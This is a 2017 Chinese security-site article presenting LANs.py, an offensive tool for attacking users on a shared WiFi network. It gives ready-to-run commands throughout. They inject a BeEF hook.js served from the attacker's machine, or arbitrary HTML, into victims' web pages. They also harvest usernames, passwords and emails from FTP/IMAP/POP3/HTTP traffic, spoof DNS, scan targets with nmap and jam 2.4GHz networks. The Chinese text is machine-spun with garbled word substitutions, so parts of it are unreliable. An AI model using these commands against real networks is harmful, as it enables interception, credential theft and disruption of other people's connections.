欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

某款能够实现代码注入,无线渗透入侵和WiFi用户监控的超强软件LANs.py

来源:本站整理 作者:佚名 时间:2017-09-18 TAG: 我要投稿


LANs.py功效简介
1.      主动探求以后网络中最为活泼的WLAN用户,并对其中的一位用户实行监控,而后向该用户所拜访的Web页面注入随意率性HTML或JavaScript代码;
2.      滋扰附近的WiFi网络,滋扰规模取决于无线网卡的机能。咱们可以通过改动设置装备摆设来完成滋扰一切人的WiFi旌旗灯号或仅滋扰某一特定用户的WiFi旌旗灯号。然则LANs.py不支撑对用户同时停止WiFi滋扰和监听。
依附组件
Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(假如你不知道目的用户的IP地点,那末你还必要一块支撑稠浊形式的无线网卡)
测试情况为Kali Linux,动员入侵攻击的装备地点为192.168.0.5,目的装备的IP地点为192.168.0.10。
一切的可选操纵项:
Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspointACCESSPOINT]
对象应用
今朝该对象支撑从如下协定网络数据:HTTP、FTP、IMAP、POP3和IRC。LANs.py将会打印出URL地点所前往的资本中前135个字符,并主动疏忽开头是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地点。除此之外,它还可以或许输入随意率性协定下传输的用户名/暗码、和接管或发送的电子邮件和IRC新闻。

罕用敕令:
python LANs.py -u -p
其余罕用敕令:
python LANs.py -u -p -d -ip 192.168.0.10
-d:检查一切的图片
-ip:设置目的IP地点
HTML注入:
python LANs.py -bhttp://192.168.0.5:3000/hook.js
向目的用户所拜访的页面中注入一个BeEF钩子(http://beefproject.com/,【参考教程】),注入的参数会包裹在标签中,以是你可以在一个JavaScript文件中的随意率性地位输入内容。
python LANs.py -c'title>Owned.title>'
向目的用户所拜访的页面中注入随意率性HTML代码。对象起首会测验考试在第一个标签以后注入内容,假如失败则测验考试在第一个标签以前注入内容。下面给出的示例代码会将页面题目(title)改动成’Owned.’。
读取pcap文件:
python LANs.py -pcap libpcapfilename -ip192.168.0.10
为了胜利读取pcap文件中的内容,你必要应用-ip参数指定目的IP。该功效的一个长处便是用户无需应用root权限便可履行该剧本。
DNS诱骗:
python LANs.py -a -r 80.87.128.67
-a选项将会对目的收回的每一次DNS哀求停止诱骗入侵攻击,并将用户哀求重定向至-r参数所制定的地点。不管用户在地点栏中输入的是什么地点,他们都将会被重定向到stallman.org(80.87.128.67)。
python LANs.py -dns eff.org
该敕令将会对域名eff.org及其子域名停止DNS诱骗。
其余应用:
python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c 'Owned.' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10
滋扰一切的WiFi网络:
python LANs.py --jam
仅滋扰指定接入点:
python Lans.py --jam --accesspoint01:MA:C0:AD:DY
一切的可用选项
惯例应用:
-b BEEF_HOOK_URL:将BeEF hookURL注入到目的用户所拜访的每个页面中,比方-bhttp://192.168.1.10:3000/hook.js。
-c ‘HTML CODE’:向目的用户拜访的页面中注入随意率性HTML代码。
-d:检查目的用户拜访的图片。
-dns DOMAIN:对指定DNS域名停止DNS诱骗入侵攻击,比方-dnsfacebook.com。
-a:对用户的一切DNS哀求停止DNS诱骗入侵攻击。
-r IPADDRESS: 仅用于-dnsDOMAIN选项。
-u:打印出目的用户所应用的URL地点。
-i INTERFACE: 指定接口,比方-i wlan0。
-ip:指定目的IP地点。
-n: 对目的履行nmap扫描。
-na:在后盾对目的履行更具入侵攻击性的nmap扫描,并将扫描成果输入到[victim IP address].nmap.txt。
-p:打印出FTP/IMAP/POP/IRC/HTTP协定下传输的用户名/暗码、和接管或发送的电子邮件和IRC新闻。
-pcap PCAP_FILE: 剖析pcap文件中一切的数据包; 必要输入-ip[target's IP address]参数。
-rmac ROUTER_MAC:指定路由器的MAC地点。
-rip ROUTER_IP:指定路由器的IP地点。
–jam:对2.4GHz无线接入点和客户端停止滋扰入侵攻击。
WiFi滋扰:
-sMAC_Address_to_skip:指定需跳过的MAC地点。
-m MAXIMUM: 指定入侵攻击客户端的最大数目。
-t TIME_INTERVAL: 设置入侵攻击距离。
–packets NUMBER:指定每一次入侵攻击中发送的数据包数目。
–accesspoint ROUTER_MAC:输入目的AP的MAC地点。

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载